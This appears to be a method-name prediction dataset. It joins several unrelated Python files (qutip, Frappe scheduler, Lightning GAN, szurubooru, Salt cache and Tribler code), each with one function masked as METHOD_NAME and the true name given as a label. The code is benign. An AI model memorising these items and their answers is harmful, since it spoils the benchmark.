processor = LinearSpinChain(num_qubits)
compiler = SpinChainCompiler(num_qubits, params=processor.params, setup="circular")
tlist, coeffs = compiler.compile(circuit)
assert(isinstance(tlist, dict))
assert("sx0" in tlist)
assert(isinstance(coeffs, dict))
assert("sx0" in coeffs)
processor.coeffs = coeffs
processor.set_all_tlist(tlist)
assert_array_equal(processor.pulses[0].coeff, coeffs["sx0"])
assert_array_equal(processor.pulses[0].tlist, tlist["sx0"])
compiler.gate_compiler["RX"] = rx_compiler_without_pulse_dict
tlist, coeffs = compiler.compile(circuit)
assert(isinstance(tlist, dict))
assert(0 in tlist)
assert(isinstance(coeffs, dict))
assert(0 in coeffs)
processor.coeffs = coeffs
processor.set_all_tlist(tlist)
assert_array_equal(processor.pulses[0].coeff, coeffs[0])
assert_array_equal(processor.pulses[0].tlist, tlist[0])
@pytest.mark.parametrize(
"shape", list(_default_window_t_max.keys()))
def test_pulse_shape(shape):
"""Test different pulse shape functions"""
coeff, tlist = GateCompiler.generate_pulse_shape(
shape, 1001, maximum=1.0, area=1.0)
assert pytest.approx(coeff[500], 1.e-2) == 1 # max
result = integrate.trapz(coeff, tlist)
assert pytest.approx(result, rel=1.e-2) == 1 # area | null |
get raw point | import unittest
from unittest.mock import patch
import numpy as np
import xarray as xr
from data.calculated import CalculatedArray, CalculatedData
from data.variable import Variable
from data.variable_list import VariableList
class TestCalculatedData(unittest.TestCase):
@patch("data.sqlite_database.SQLiteDatabase.get_data_variables")
def test_nothing(self, mock_query_func):
mock_query_func.return_value = VariableList(
[
Variable(
"votemper",
"Sea water potential temperature",
"Kelvin",
sorted(["time", "depth", "latitude", "longitude"]),
)
]
)
with CalculatedImpl("tests/testdata/mercator_test.nc") as data:
self.assertEqual(len(data.variables), 1)
v = data.get_dataset_variable("votemper")
self.assertEqual(xr.DataArray, type(v))
self.assertAlmostEqual(v[0, 0, 17, 816].values, 271.1796875)
@patch("data.sqlite_database.SQLiteDatabase.get_data_variables")
@patch("data.sqlite_database.SQLiteDatabase.get_variable_dims")
def test_new_variable(self, mock_get_var_dims, mock_query_func):
mock_get_var_dims.return_value = ["time", "depth", "latitude", "longitude"]
mock_query_func.return_value = VariableList(
[
Variable(
"votemper",
"Sea water potential temperature",
"Kelvin",
sorted(["time", "depth", "latitude", "longitude"]),
)
]
)
calculated = {
"votemper_new": {
"equation": "votemper * 2",
"long_name": "Temperature",
"dims": ("time", "depth", "latitude", "longitude"),
"units": "degree_C",
"valid_min": -273.15,
"valid_max": 999.0,
}
}
with CalculatedImpl(
"tests/testdata/mercator_test.nc", calculated=calculated
) as data:
self.assertEqual(len(data.variables), 2)
v = data.get_dataset_variable("votemper_new")
self.assertAlmostEqual(v[0, 0, 17, 816].values, 2.0 * 271.1796875)
self.assertEqual(v.attrs.long_name, "Temperature")
self.assertEqual(v.shape, (1, 50, 850, 1800))
@patch("data.sqlite_database.SQLiteDatabase.get_data_variables")
def test_override(self, mock_query_func):
mock_query_func.return_value = VariableList(
[
Variable(
"votemper",
"Sea water potential temperature",
"Kelvin",
sorted(["time", "depth", "latitude", "longitude"]),
)
]
)
calculated = {
"votemper": {
"equation": "votemper -273.15",
"units": "degree_C",
"dims": ("time", "depth", "latitude", "longitude"),
}
}
with CalculatedImpl(
"tests/testdata/mercator_test.nc", calculated=calculated
) as data:
self.assertEqual(len(data.variables), 1)
v = data.get_dataset_variable("votemper")
self.assertAlmostEqual(v[0, 0, 17, 816].values, 271.1796875 - 273.15)
self.assertEqual(v.attrs.long_name, "Sea water potential temperature")
self.assertEqual(v.shape, (1, 50, 850, 1800))
def test_calculated_var_wo_dims_raises(self):
calculated = {
"votemper": {
"equation": "votemper -273.15",
"units": "degree_C",
}
}
with CalculatedImpl(
"tests/testdata/mercator_test.nc", calculated=calculated
) as data:
with self.assertRaises(KeyError):
data.get_dataset_variable("votemper")
class CalculatedImpl(CalculatedData):
def __init__(self, url: str, **kwargs):
super().__init__(url, **kwargs)
def get_point(self):
pass
def get_profile(self):
pass
def METHOD_NAME(self):
pass
def depths(self):
pass
class TestCalculatedArray(unittest.TestCase):
def test_attrs(self):
attrs = {"my_attr": 420}
dataset = xr.Dataset()
array = CalculatedArray(dataset, "3 * 5", [], attrs)
self.assertEqual(array[:].attrs, attrs)
self.assertEqual(array.attrs, attrs)
def test_static(self):
dataset = xr.Dataset()
array = CalculatedArray(dataset, "3 * 5", [])
self.assertEqual(array[0], 15)
def test_passthrough(self):
dataset = xr.Dataset({"var": ("x", [1, 2, 3, 4, 5])})
array = CalculatedArray(dataset, "var", ["x"])
self.assertEqual(array[0], 1)
self.assertEqual(array[2], 3)
self.assertEqual(array[4], 5)
def test_single_expression(self):
dataset = xr.Dataset({"var": ("x", [1, 2, 3, 4, 5])})
array = CalculatedArray(dataset, "var * 5", ["x"])
self.assertEqual(array[0], 5)
self.assertEqual(array[2], 15)
self.assertEqual(array[4], 25)
def test_multiple_expression(self):
dataset = xr.Dataset(
{
"var": ("x", [1, 2, 3, 4, 5]),
"var2": ("x", [5, 4, 3, 2, 1]),
}
)
array = CalculatedArray(dataset, "var + var2", ["x"])
self.assertEqual(array[0], 6)
self.assertEqual(array[2], 6)
self.assertEqual(array[4], 6)
def test_different_dimensions(self):
dataset = xr.Dataset(
{
"var": ("x", [1, 2]),
"var2": ("y", [3, 4]),
"var3": (("x", "y"), [[5, 6], [7, 8]]),
"var4": (("y", "x"), [[9, 10], [11, 12]]),
}
)
array = CalculatedArray(dataset, "var + var2", ["x"])
self.assertIsNan(array[0])
array = CalculatedArray(dataset, "var3 + var4", ["x"])
self.assertIsNan(array[0, 0])
array = CalculatedArray(dataset, "var + var3", ["x", "y"])
self.assertEqual(array[0, 0], 6)
self.assertEqual(array[0, 1], 7)
self.assertEqual(array[1, 0], 9)
self.assertEqual(array[1, 1], 10)
def assertIsNan(self, value):
v = value
return self.assertTrue(np.isnan(v)) | null |
enqueue events for all sites | # Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# License: MIT. See LICENSE
"""
Events:
always
daily
monthly
weekly
"""
# imports - standard imports
import os
import random
import time
from typing import NoReturn
# imports - module imports
import frappe
from frappe.utils import cint, get_datetime, get_sites, now_datetime
from frappe.utils.background_jobs import set_niceness
DATETIME_FORMAT = "%Y-%m-%d %H:%M:%S"
def cprint(*args, **kwargs):
"""Prints only if called from STDOUT"""
try:
os.get_terminal_size()
print(*args, **kwargs)
except Exception:
pass
def start_scheduler() -> NoReturn:
"""Run enqueue_events_for_all_sites based on scheduler tick.
Specify scheduler_interval in seconds in common_site_config.json"""
tick = cint(frappe.get_conf().scheduler_tick_interval) or 60
set_niceness()
while True:
time.sleep(tick)
METHOD_NAME()
def METHOD_NAME() -> None:
"""Loop through sites and enqueue events that are not already queued"""
if os.path.exists(os.path.join(".", ".restarting")):
# Don't add task to queue if webserver is in restart mode
return
with frappe.init_site():
sites = get_sites()
# Sites are sorted in alphabetical order, shuffle to randomize priorities
random.shuffle(sites)
for site in sites:
try:
enqueue_events_for_site(site=site)
except Exception:
frappe.logger("scheduler").debug(f"Failed to enqueue events for site: {site}", exc_info=True)
def enqueue_events_for_site(site: str) -> None:
def log_exc():
frappe.logger("scheduler").error(f"Exception in Enqueue Events for Site {site}", exc_info=True)
try:
frappe.init(site=site)
frappe.connect()
if is_scheduler_inactive():
return
enqueue_events(site=site)
frappe.logger("scheduler").debug(f"Queued events for site {site}")
except Exception as e:
if frappe.db.is_access_denied(e):
frappe.logger("scheduler").debug(f"Access denied for site {site}")
log_exc()
finally:
frappe.destroy()
def enqueue_events(site: str) -> list[str] | None:
if schedule_jobs_based_on_activity():
enqueued_jobs = []
for job_type in frappe.get_all("Scheduled Job Type", filters={"stopped": 0}, fields="*"):
job_type = frappe.get_doc(doctype="Scheduled Job Type", **job_type)
if job_type.enqueue():
enqueued_jobs.append(job_type.method)
return enqueued_jobs
def is_scheduler_inactive(verbose=True) -> bool:
if frappe.local.conf.maintenance_mode:
if verbose:
cprint(f"{frappe.local.site}: Maintenance mode is ON")
return True
if frappe.local.conf.pause_scheduler:
if verbose:
cprint(f"{frappe.local.site}: frappe.conf.pause_scheduler is SET")
return True
if is_scheduler_disabled(verbose=verbose):
return True
return False
def is_scheduler_disabled(verbose=True) -> bool:
if frappe.conf.disable_scheduler:
if verbose:
cprint(f"{frappe.local.site}: frappe.conf.disable_scheduler is SET")
return True
scheduler_disabled = not frappe.utils.cint(
frappe.db.get_single_value("System Settings", "enable_scheduler")
)
if scheduler_disabled:
if verbose:
cprint(f"{frappe.local.site}: SystemSettings.enable_scheduler is UNSET")
return scheduler_disabled
def toggle_scheduler(enable):
frappe.db.set_single_value("System Settings", "enable_scheduler", int(enable))
def enable_scheduler():
toggle_scheduler(True)
def disable_scheduler():
toggle_scheduler(False)
def schedule_jobs_based_on_activity(check_time=None):
"""Returns True for active sites defined by Activity Log
Returns True for inactive sites once in 24 hours"""
if is_dormant(check_time=check_time):
# ensure last job is one day old
last_job_timestamp = _get_last_modified_timestamp("Scheduled Job Log")
if not last_job_timestamp:
return True
else:
if ((check_time or now_datetime()) - last_job_timestamp).total_seconds() >= 86400:
# one day is passed since jobs are run, so lets do this
return True
else:
# schedulers run in the last 24 hours, do nothing
return False
else:
# site active, lets run the jobs
return True
def is_dormant(check_time=None):
last_activity_log_timestamp = _get_last_modified_timestamp("Activity Log")
since = (frappe.get_system_settings("dormant_days") or 4) * 86400
if not last_activity_log_timestamp:
return True
if ((check_time or now_datetime()) - last_activity_log_timestamp).total_seconds() >= since:
return True
return False
def _get_last_modified_timestamp(doctype):
timestamp = frappe.db.get_value(
doctype, filters={}, fieldname="modified", order_by="modified desc"
)
if timestamp:
return get_datetime(timestamp)
@frappe.whitelist()
def activate_scheduler():
from frappe.installer import update_site_config
frappe.only_for("Administrator")
if frappe.local.conf.maintenance_mode:
frappe.throw(frappe._("Scheduler can not be re-enabled when maintenance mode is active."))
if is_scheduler_disabled():
enable_scheduler()
if frappe.conf.pause_scheduler:
update_site_config("pause_scheduler", 0)
@frappe.whitelist()
def get_scheduler_status():
if is_scheduler_inactive():
return {"status": "inactive"}
return {"status": "active"} | null |
block | # Copyright The Lightning AI team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""To run this template just do: python generative_adversarial_net.py.
After a few epochs, launch TensorBoard to see the images being generated at every batch:
tensorboard --logdir default
"""
from argparse import ArgumentParser, Namespace
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
from lightning.pytorch import cli_lightning_logo
from lightning.pytorch.core import LightningModule
from lightning.pytorch.demos.mnist_datamodule import MNISTDataModule
from lightning.pytorch.trainer import Trainer
from lightning.pytorch.utilities.imports import _TORCHVISION_AVAILABLE
if _TORCHVISION_AVAILABLE:
import torchvision
class Generator(nn.Module):
"""
>>> Generator(img_shape=(1, 8, 8)) # doctest: +ELLIPSIS +NORMALIZE_WHITESPACE
Generator(
(model): Sequential(...)
)
"""
def __init__(self, latent_dim: int = 100, img_shape: tuple = (1, 28, 28)):
super().__init__()
self.img_shape = img_shape
def METHOD_NAME(in_feat, out_feat, normalize=True):
layers = [nn.Linear(in_feat, out_feat)]
if normalize:
layers.append(nn.BatchNorm1d(out_feat, 0.8))
layers.append(nn.LeakyReLU(0.2, inplace=True))
return layers
self.model = nn.Sequential(
*METHOD_NAME(latent_dim, 128, normalize=False),
*METHOD_NAME(128, 256),
*METHOD_NAME(256, 512),
*METHOD_NAME(512, 1024),
nn.Linear(1024, int(np.prod(img_shape))),
nn.Tanh(),
)
def forward(self, z):
img = self.model(z)
return img.view(img.size(0), *self.img_shape)
class Discriminator(nn.Module):
"""
>>> Discriminator(img_shape=(1, 28, 28)) # doctest: +ELLIPSIS +NORMALIZE_WHITESPACE
Discriminator(
(model): Sequential(...)
)
"""
def __init__(self, img_shape):
super().__init__()
self.model = nn.Sequential(
nn.Linear(int(np.prod(img_shape)), 512),
nn.LeakyReLU(0.2, inplace=True),
nn.Linear(512, 256),
nn.LeakyReLU(0.2, inplace=True),
nn.Linear(256, 1),
)
def forward(self, img):
img_flat = img.view(img.size(0), -1)
return self.model(img_flat)
class GAN(LightningModule):
"""
>>> GAN(img_shape=(1, 8, 8)) # doctest: +ELLIPSIS +NORMALIZE_WHITESPACE
GAN(
(generator): Generator(
(model): Sequential(...)
)
(discriminator): Discriminator(
(model): Sequential(...)
)
)
"""
def __init__(
self,
img_shape: tuple = (1, 28, 28),
lr: float = 0.0002,
b1: float = 0.5,
b2: float = 0.999,
latent_dim: int = 100,
):
super().__init__()
self.save_hyperparameters()
self.automatic_optimization = False
# networks
self.generator = Generator(latent_dim=self.hparams.latent_dim, img_shape=img_shape)
self.discriminator = Discriminator(img_shape=img_shape)
self.validation_z = torch.randn(8, self.hparams.latent_dim)
self.example_input_array = torch.zeros(2, self.hparams.latent_dim)
def forward(self, z):
return self.generator(z)
@staticmethod
def adversarial_loss(y_hat, y):
return F.binary_cross_entropy_with_logits(y_hat, y)
def training_step(self, batch):
imgs, _ = batch
opt_g, opt_d = self.optimizers()
# sample noise
z = torch.randn(imgs.shape[0], self.hparams.latent_dim)
z = z.type_as(imgs)
# Train generator
# ground truth result (ie: all fake)
# put on GPU because we created this tensor inside training_loop
valid = torch.ones(imgs.size(0), 1)
valid = valid.type_as(imgs)
self.toggle_optimizer(opt_g)
# adversarial loss is binary cross-entropy
g_loss = self.adversarial_loss(self.discriminator(self(z)), valid)
opt_g.zero_grad()
self.manual_backward(g_loss)
opt_g.step()
self.untoggle_optimizer(opt_g)
# Train discriminator
# Measure discriminator's ability to classify real from generated samples
# how well can it label as real?
valid = torch.ones(imgs.size(0), 1)
valid = valid.type_as(imgs)
self.toggle_optimizer(opt_d)
real_loss = self.adversarial_loss(self.discriminator(imgs), valid)
# how well can it label as fake?
fake = torch.zeros(imgs.size(0), 1)
fake = fake.type_as(imgs)
fake_loss = self.adversarial_loss(self.discriminator(self(z).detach()), fake)
# discriminator loss is the average of these
d_loss = (real_loss + fake_loss) / 2
opt_d.zero_grad()
self.manual_backward(d_loss)
opt_d.step()
self.untoggle_optimizer(opt_d)
self.log_dict({"d_loss": d_loss, "g_loss": g_loss})
def configure_optimizers(self):
lr = self.hparams.lr
b1 = self.hparams.b1
b2 = self.hparams.b2
opt_g = torch.optim.Adam(self.generator.parameters(), lr=lr, betas=(b1, b2))
opt_d = torch.optim.Adam(self.discriminator.parameters(), lr=lr, betas=(b1, b2))
return opt_g, opt_d
def on_train_epoch_end(self):
z = self.validation_z.type_as(self.generator.model[0].weight)
# log sampled images
sample_imgs = self(z)
grid = torchvision.utils.make_grid(sample_imgs)
for logger in self.loggers:
logger.experiment.add_image("generated_images", grid, self.current_epoch)
def main(args: Namespace) -> None:
# ------------------------
# 1 INIT LIGHTNING MODEL
# ------------------------
model = GAN(lr=args.lr, b1=args.b1, b2=args.b2, latent_dim=args.latent_dim)
# ------------------------
# 2 INIT TRAINER
# ------------------------
# If use distributed training PyTorch recommends to use DistributedDataParallel.
# See: https://pytorch.org/docs/stable/nn.html#torch.nn.DataParallel
dm = MNISTDataModule()
trainer = Trainer(accelerator="gpu", devices=1)
# ------------------------
# 3 START TRAINING
# ------------------------
trainer.fit(model, dm)
if __name__ == "__main__":
cli_lightning_logo()
parser = ArgumentParser()
# Hyperparameters
parser.add_argument("--lr", type=float, default=0.0002, help="adam: learning rate")
parser.add_argument("--b1", type=float, default=0.5, help="adam: decay of first order momentum of gradient")
parser.add_argument("--b2", type=float, default=0.999, help="adam: decay of second order momentum of gradient")
parser.add_argument("--latent_dim", type=int, default=100, help="dimensionality of the latent space")
args = parser.parse_args()
main(args) | null |
test removing twice | from datetime import datetime
from unittest.mock import patch
import pytest
from szurubooru import api, db, errors, model
from szurubooru.func import posts
@pytest.fixture(autouse=True)
def inject_config(config_injector):
config_injector(
{"privileges": {"posts:favorite": model.User.RANK_REGULAR}}
)
def test_adding_to_favorites(
user_factory, post_factory, context_factory, fake_datetime
):
post = post_factory()
db.session.add(post)
db.session.commit()
assert post.score == 0
with patch("szurubooru.func.posts.serialize_post"), fake_datetime(
"1997-12-01"
):
posts.serialize_post.return_value = "serialized post"
result = api.post_api.add_post_to_favorites(
context_factory(user=user_factory()), {"post_id": post.post_id}
)
assert result == "serialized post"
post = db.session.query(model.Post).one()
assert db.session.query(model.PostFavorite).count() == 1
assert post is not None
assert post.favorite_count == 1
assert post.score == 1
def test_removing_from_favorites(
user_factory, post_factory, context_factory, fake_datetime
):
user = user_factory()
post = post_factory()
db.session.add(post)
db.session.commit()
assert post.score == 0
with patch("szurubooru.func.posts.serialize_post"):
with fake_datetime("1997-12-01"):
api.post_api.add_post_to_favorites(
context_factory(user=user), {"post_id": post.post_id}
)
assert post.score == 1
with fake_datetime("1997-12-02"):
api.post_api.delete_post_from_favorites(
context_factory(user=user), {"post_id": post.post_id}
)
post = db.session.query(model.Post).one()
assert post.score == 1
assert db.session.query(model.PostFavorite).count() == 0
assert post.favorite_count == 0
def test_favoriting_twice(
user_factory, post_factory, context_factory, fake_datetime
):
user = user_factory()
post = post_factory()
db.session.add(post)
db.session.commit()
with patch("szurubooru.func.posts.serialize_post"):
with fake_datetime("1997-12-01"):
api.post_api.add_post_to_favorites(
context_factory(user=user), {"post_id": post.post_id}
)
with fake_datetime("1997-12-02"):
api.post_api.add_post_to_favorites(
context_factory(user=user), {"post_id": post.post_id}
)
post = db.session.query(model.Post).one()
assert db.session.query(model.PostFavorite).count() == 1
assert post.favorite_count == 1
def METHOD_NAME(
user_factory, post_factory, context_factory, fake_datetime
):
user = user_factory()
post = post_factory()
db.session.add(post)
db.session.commit()
with patch("szurubooru.func.posts.serialize_post"):
with fake_datetime("1997-12-01"):
api.post_api.add_post_to_favorites(
context_factory(user=user), {"post_id": post.post_id}
)
with fake_datetime("1997-12-02"):
api.post_api.delete_post_from_favorites(
context_factory(user=user), {"post_id": post.post_id}
)
with fake_datetime("1997-12-02"):
api.post_api.delete_post_from_favorites(
context_factory(user=user), {"post_id": post.post_id}
)
post = db.session.query(model.Post).one()
assert db.session.query(model.PostFavorite).count() == 0
assert post.favorite_count == 0
def test_favorites_from_multiple_users(
user_factory, post_factory, context_factory, fake_datetime
):
user1 = user_factory()
user2 = user_factory()
post = post_factory()
db.session.add_all([user1, user2, post])
db.session.commit()
with patch("szurubooru.func.posts.serialize_post"):
with fake_datetime("1997-12-01"):
api.post_api.add_post_to_favorites(
context_factory(user=user1), {"post_id": post.post_id}
)
with fake_datetime("1997-12-02"):
api.post_api.add_post_to_favorites(
context_factory(user=user2), {"post_id": post.post_id}
)
post = db.session.query(model.Post).one()
assert db.session.query(model.PostFavorite).count() == 2
assert post.favorite_count == 2
assert post.last_favorite_time == datetime(1997, 12, 2)
def test_trying_to_update_non_existing(user_factory, context_factory):
with pytest.raises(posts.PostNotFoundError):
api.post_api.add_post_to_favorites(
context_factory(user=user_factory()), {"post_id": 5}
)
def test_trying_to_rate_without_privileges(
user_factory, post_factory, context_factory
):
post = post_factory()
db.session.add(post)
db.session.commit()
with pytest.raises(errors.AuthError):
api.post_api.add_post_to_favorites(
context_factory(user=user_factory(rank=model.User.RANK_ANONYMOUS)),
{"post_id": post.post_id},
) | null |
test unicode error | """
tests.unit.utils.cache_test
~~~~~~~~~~~~~~~~~~~~~~~~~~~
Test the salt cache objects
"""
import logging
import pathlib
import time
import pytest
import salt.loader
import salt.payload
import salt.utils.cache as cache
import salt.utils.data
import salt.utils.files
from tests.support.mock import patch
def test_sanity():
"""
Make sure you can instantiate etc.
"""
cd = cache.CacheDict(5)
assert isinstance(cd, cache.CacheDict)
# do some tests to make sure it looks like a dict
assert "foo" not in cd
cd["foo"] = "bar"
assert cd["foo"] == "bar"
del cd["foo"]
assert "foo" not in cd
def test_ttl():
cd = cache.CacheDict(0.1)
cd["foo"] = "bar"
assert "foo" in cd
assert cd["foo"] == "bar"
time.sleep(0.2)
assert "foo" not in cd
# make sure that a get would get a regular old key error
with pytest.raises(KeyError):
cd["foo"] # pylint: disable=pointless-statement
@pytest.fixture
def cache_dir(minion_opts):
return pathlib.Path(minion_opts["cachedir"])
def test_smoke_context(minion_opts):
"""
Smoke test the context cache
"""
context_cache = cache.ContextCache(minion_opts, "cache_test")
data = {"a": "b"}
context_cache.cache_context(data.copy())
ret = context_cache.get_cache_context()
assert ret == data
@pytest.fixture
def cache_mod_name():
return "cache_mod"
@pytest.fixture
def cache_mods_path(tmp_path, cache_mod_name):
_cache_mods_path = tmp_path / "cache_mods"
mod_contents = """
import salt.utils.cache
def __virtual__():
return True
@salt.utils.cache.context_cache
def test_context_module():
if "called" in __context__:
__context__["called"] += 1
else:
__context__["called"] = 0
return __context__.value()
@salt.utils.cache.context_cache
def test_compare_context():
return __context__.value()
"""
with pytest.helpers.temp_file(
cache_mod_name + ".py", mod_contents, _cache_mods_path
):
yield _cache_mods_path
def test_context_wrapper(minion_opts, cache_mods_path):
"""
Test to ensure that a module which decorates itself
with a context cache can store and retrieve its contextual
data
"""
loader = salt.loader.LazyLoader(
[str(cache_mods_path)],
tag="rawmodule",
virtual_enable=False,
opts=minion_opts,
)
cache_test_func = loader["cache_mod.test_context_module"]
assert cache_test_func()["called"] == 0
assert cache_test_func()["called"] == 1
def test_set_cache(minion_opts, cache_mods_path, cache_mod_name, cache_dir):
"""
Tests to ensure the cache is written correctly
"""
context = {"c": "d"}
loader = salt.loader.LazyLoader(
[str(cache_mods_path)],
tag="rawmodule",
virtual_enable=False,
opts=minion_opts,
pack={"__context__": context, "__opts__": minion_opts},
)
cache_test_func = loader["cache_mod.test_context_module"]
# Call the function to trigger the context cache
assert cache_test_func()["called"] == 0
assert cache_test_func()["called"] == 1
assert cache_test_func()["called"] == 2
cache_file_name = "salt.loaded.ext.rawmodule.{}.p".format(cache_mod_name)
cached_file = cache_dir / "context" / cache_file_name
assert cached_file.exists()
# Test manual de-serialize
target_cache_data = salt.utils.data.decode(
salt.payload.loads(cached_file.read_bytes())
)
assert target_cache_data == dict(context, called=1)
# Test cache de-serialize
cc = cache.ContextCache(
minion_opts, "salt.loaded.ext.rawmodule.{}".format(cache_mod_name)
)
retrieved_cache = cc.get_cache_context()
assert retrieved_cache == dict(context, called=1)
def test_refill_cache(minion_opts, cache_mods_path):
"""
Tests to ensure that the context cache can rehydrate a wrapped function
"""
context = {"c": "d"}
loader = salt.loader.LazyLoader(
[str(cache_mods_path)],
tag="rawmodule",
virtual_enable=False,
opts=minion_opts,
pack={"__context__": context, "__opts__": minion_opts},
)
cache_test_func = loader["cache_mod.test_compare_context"]
# First populate the cache
ret = cache_test_func()
assert ret == context
# Then try to rehydrate a func
context_copy = context.copy()
context.clear()
# Compare to the context before it was emptied
ret = cache_test_func()
assert ret == context_copy
def test_everything(cache_dir):
"""
Make sure you can instantiate, add, update, remove, expire
"""
path = str(cache_dir / "minion")
# test instantiation
cd = cache.CacheDisk(0.3, path)
assert isinstance(cd, cache.CacheDisk)
# test to make sure it looks like a dict
assert "foo" not in cd
cd["foo"] = "bar"
assert "foo" in cd
assert cd["foo"] == "bar"
del cd["foo"]
assert "foo" not in cd
# test persistence
cd["foo"] = "bar"
cd2 = cache.CacheDisk(0.3, path)
assert "foo" in cd2
assert cd2["foo"] == "bar"
# test ttl
time.sleep(0.5)
assert "foo" not in cd
assert "foo" not in cd2
@pytest.mark.parametrize(
"data",
[
b"PK\x03\x04\n\x00\x00\x00\x00\x00\xb6B\x05S\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x1c\x00test2/",
b"\xc3\x83\xc2\xa6\xc3\x83\xc2\xb8\xc3\x83\xc2\xa5",
],
)
def METHOD_NAME(cache_dir, data, caplog):
"""
Test when the data in the cache raises a UnicodeDecodeError
we do not raise an error.
"""
path = cache_dir / "minion"
path.touch()
cache_data = {
"CacheDisk_data": {
b"poc-minion": {
None: {
b"secrets": {
b"itsasecret": data,
b"CacheDisk_cachetime": {b"poc-minion": 1649339137.1236317},
}
}
}
}
}
with patch.object(
salt.utils.msgpack, "load", return_value=cache_data
), caplog.at_level(logging.DEBUG):
cd = cache.CacheDisk(0.3, str(path))
# this test used to rely on msgpack throwing errors if attempt to read an empty file
# code now checks if file empty and returns, so we should never attempt msgpack load
assert cd._dict == {}
assert not (
f"Error reading cache file at '{path}': Unpack failed: incomplete input"
in caplog.messages
)
def test_cache_corruption(cache_dir):
"""
Tests if the CacheDisk can survive a corrupted cache file.
"""
# Write valid cache file
cache_file = cache_dir / "minion"
cd = cache.CacheDisk(0.3, str(cache_file))
cd["test-key"] = "test-value"
del cd
# Add random string to the data to make the msgpack structure un-decodable
with cache_file.open("a") as f:
f.write("I am data that should corrupt the msgpack file")
# Reopen cache, try to fetch key
cd = cache.CacheDisk(0.3, str(cache_file))
# If the cache is unreadable, we want it to act like an empty cache (as
# if the file did not exist in the first place), and should raise a KeyError
with pytest.raises(KeyError):
assert cd["test-key"] | null |
get alive checked torrents | from __future__ import annotations
import random
from binascii import unhexlify
from typing import List, TYPE_CHECKING
from ipv8.lazy_community import lazy_wrapper
from pony.orm import db_session
from tribler.core.components.metadata_store.remote_query_community.remote_query_community import RemoteQueryCommunity
from tribler.core.components.popularity.community.payload import PopularTorrentsRequest, TorrentsHealthPayload
from tribler.core.components.popularity.community.version_community_mixin import VersionCommunityMixin
from tribler.core.components.torrent_checker.torrent_checker.dataclasses import HealthInfo
from tribler.core.utilities.pony_utils import run_threaded
from tribler.core.utilities.unicode import hexlify
from tribler.core.utilities.utilities import get_normally_distributed_positive_integers
if TYPE_CHECKING:
from tribler.core.components.torrent_checker.torrent_checker.torrent_checker import TorrentChecker
class PopularityCommunity(RemoteQueryCommunity, VersionCommunityMixin):
"""
Community for disseminating the content across the network.
Push:
- Every 5 seconds it gossips 10 random torrents to a random peer.
Pull:
- Every time it receives an introduction request, it sends a request
to return their popular torrents.
Gossiping is for checked torrents only.
"""
GOSSIP_INTERVAL_FOR_RANDOM_TORRENTS = 5 # seconds
GOSSIP_POPULAR_TORRENT_COUNT = 10
GOSSIP_RANDOM_TORRENT_COUNT = 10
community_id = unhexlify('9aca62f878969c437da9844cba29a134917e1648')
def __init__(self, *args, torrent_checker=None, **kwargs):
# Creating a separate instance of Network for this community to find more peers
super().__init__(*args, **kwargs)
self.torrent_checker: TorrentChecker = torrent_checker
self.add_message_handler(TorrentsHealthPayload, self.on_torrents_health)
self.add_message_handler(PopularTorrentsRequest, self.on_popular_torrents_request)
self.logger.info('Popularity Community initialized (peer mid %s)', hexlify(self.my_peer.mid))
self.register_task("gossip_random_torrents", self.gossip_random_torrents_health,
interval=PopularityCommunity.GOSSIP_INTERVAL_FOR_RANDOM_TORRENTS)
# Init version community message handlers
self.init_version_community()
def introduction_request_callback(self, peer, dist, payload):
super().introduction_request_callback(peer, dist, payload)
# Send request to peer to send popular torrents
self.ez_send(peer, PopularTorrentsRequest())
def METHOD_NAME(self) -> List[HealthInfo]:
if not self.torrent_checker:
return []
# Filter torrents that have seeders
return [health for health in self.torrent_checker.torrents_checked.values() if
health.seeders > 0 and health.leechers >= 0]
def gossip_random_torrents_health(self):
"""
Gossip random torrent health information to another peer.
"""
if not self.get_peers() or not self.torrent_checker:
return
random_torrents = self.get_random_torrents()
random_peer = random.choice(self.get_peers())
self.ez_send(random_peer, TorrentsHealthPayload.create(random_torrents, {}))
@lazy_wrapper(TorrentsHealthPayload)
async def on_torrents_health(self, peer, payload):
self.logger.debug(f"Received torrent health information for "
f"{len(payload.torrents_checked)} popular torrents and"
f" {len(payload.random_torrents)} random torrents")
health_tuples = payload.random_torrents + payload.torrents_checked
health_list = [HealthInfo(infohash, last_check=last_check, seeders=seeders, leechers=leechers)
for infohash, seeders, leechers, last_check in health_tuples]
for infohash in await run_threaded(self.mds.db, self.process_torrents_health, health_list):
# Get a single result per infohash to avoid duplicates
self.send_remote_select(peer=peer, infohash=infohash, last=1)
@db_session
def process_torrents_health(self, health_list: List[HealthInfo]):
infohashes_to_resolve = set()
for health in health_list:
added = self.mds.process_torrent_health(health)
if added:
infohashes_to_resolve.add(health.infohash)
return infohashes_to_resolve
@lazy_wrapper(PopularTorrentsRequest)
async def on_popular_torrents_request(self, peer, payload):
self.logger.debug("Received popular torrents health request")
popular_torrents = self.get_likely_popular_torrents()
self.ez_send(peer, TorrentsHealthPayload.create({}, popular_torrents))
def get_likely_popular_torrents(self) -> List[HealthInfo]:
checked_and_alive = self.METHOD_NAME()
if not checked_and_alive:
return []
num_torrents = len(checked_and_alive)
num_torrents_to_send = min(PopularityCommunity.GOSSIP_RANDOM_TORRENT_COUNT, num_torrents)
likely_popular_indices = self._get_likely_popular_indices(num_torrents_to_send, num_torrents)
sorted_torrents = sorted(list(checked_and_alive), key=lambda health: -health.seeders)
likely_popular_torrents = [sorted_torrents[i] for i in likely_popular_indices]
return likely_popular_torrents
def _get_likely_popular_indices(self, size, limit) -> List[int]:
"""
Returns a list of indices favoring the lower value numbers.
Assuming lower indices being more popular than higher value indices, the returned list
favors the lower indexed popular values.
@param size: Number of indices to return
@param limit: Max number of indices that can be returned.
@return: List of non-repeated positive indices.
"""
return get_normally_distributed_positive_integers(size=size, upper_limit=limit)
def get_random_torrents(self) -> List[HealthInfo]:
checked_and_alive = list(self.METHOD_NAME())
if not checked_and_alive:
return []
num_torrents = len(checked_and_alive)
